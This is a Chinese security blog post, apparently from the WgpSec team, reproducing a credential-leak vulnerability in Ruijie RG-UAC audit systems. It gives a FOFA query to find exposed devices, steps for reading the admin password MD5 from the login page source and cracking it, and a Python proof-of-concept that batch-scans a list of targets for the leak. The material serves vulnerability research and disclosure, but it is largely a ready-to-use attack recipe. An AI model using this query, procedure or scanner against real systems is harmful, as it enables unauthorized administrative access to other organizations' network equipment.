本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
点击蓝字
关注我们
_声明
_
本文作者:PeiQi
本文字数:1030
阅读时长:5~6分钟
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
前言
WgpSec·玄狼 漏洞复现招收师傅
有意者简历投至
**[email protected]
**
一、
漏洞描述
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台
二、
漏洞影响
锐捷RG-UAC统一上网行为管理审计系统
三、
漏洞复现
使用FOFA语句包含关键字查找FOFA语句(仅供学习参考,请勿非法利用)
title="RG-UAC登录页面" && body="admin"
登录页面如下
F12查看网页源码搜索关键字 admin
使用 password值 md5解密
使用admin作为用户名,破解的密码即可登录后台系统
四、
漏洞利用POC
`import requests``import sys``import random``import re``from requests.packages.urllib3.exceptions import InsecureRequestWarning``def title():` `print('+------------------------------------------')` `print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')` `print('+ \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统 \033[0m')` `print('+ \033[36m使用格式: python3 poc.py \033[0m')` `print('+ \033[36mFile >>> ip.txt \033[0m')` `print('+------------------------------------------')``def POC_1(target_url):` `vuln_url = target_url` `headers = {` `"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",` `}` `try:` `requests.packages.urllib3.disable_warnings(InsecureRequestWarning)` `response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)` `if "super_admin" in response.text and "password" in response.text and response.status_code == 200:` `print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))` `else:` `print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))` `except Exception as e:` `print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))``def Scan(file_name):` `with open(file_name, "r", encoding='utf8') as scan_url:` `for url in scan_url:` `if url[:4] != "http":` `url = "http://" + url` `url = url.strip('\n')` `try:` `POC_1(url)` `except Exception as e:` `print("\033[31m[x] 请求报错 \033[0m".format(e))` `continue``if __name__ == '__main__':` `title()` `file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))` `Scan(file_name)`
作者
PeiQi
感谢观看啦~
扫描关注公众号回复加群
和师傅们一起讨论研究~
长
按
关
注
WgpSec狼组安全团队
微信号:wgpsec
Twitter:@wgpsec